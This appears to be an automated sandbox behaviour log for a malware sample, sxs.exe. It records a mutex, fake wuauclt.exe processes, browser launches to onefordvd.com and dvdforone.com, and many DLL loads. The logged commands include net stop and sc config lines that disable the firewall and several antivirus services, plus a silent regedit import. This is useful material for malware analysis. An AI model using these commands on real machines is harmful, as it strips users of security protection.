Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\VIRUS_ASMAPING_XZASDWRTTYEEWD82473M
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\sxs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\sxs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: sxs.exeReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\sxs.exeFile read: C:\Users\user\Desktop\sxs.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\sxs.exe "C:\Users\user\Desktop\sxs.exe"
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe"
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccess
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVWSC
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabled
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVSrvXP start= disabled
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop kavsvc
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config kavsvc start= disabled
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsRavMon start= disabled
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop sharedaccess
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsCCenter
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVWSC
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsCCenter start= disabled
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsRavMon
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop kavsvc
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsCCenter
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsRavMon
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe"
Source: C:\Windows\wuauclt.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" http://www.dvdforone.com
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.comJump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe" Jump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.comJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.regJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccessJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVWSCJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVSrvXPJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVSrvXP start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop kavsvcJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config kavsvc start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsRavMon start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsCCenterJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsCCenter start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsRavMonJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop sharedaccess
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVWSC
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop kavsvc
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsCCenter
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsRavMon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\wuauclt.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" http://www.dvdforone.com
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\sxs.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\sxs.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\wuauclt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
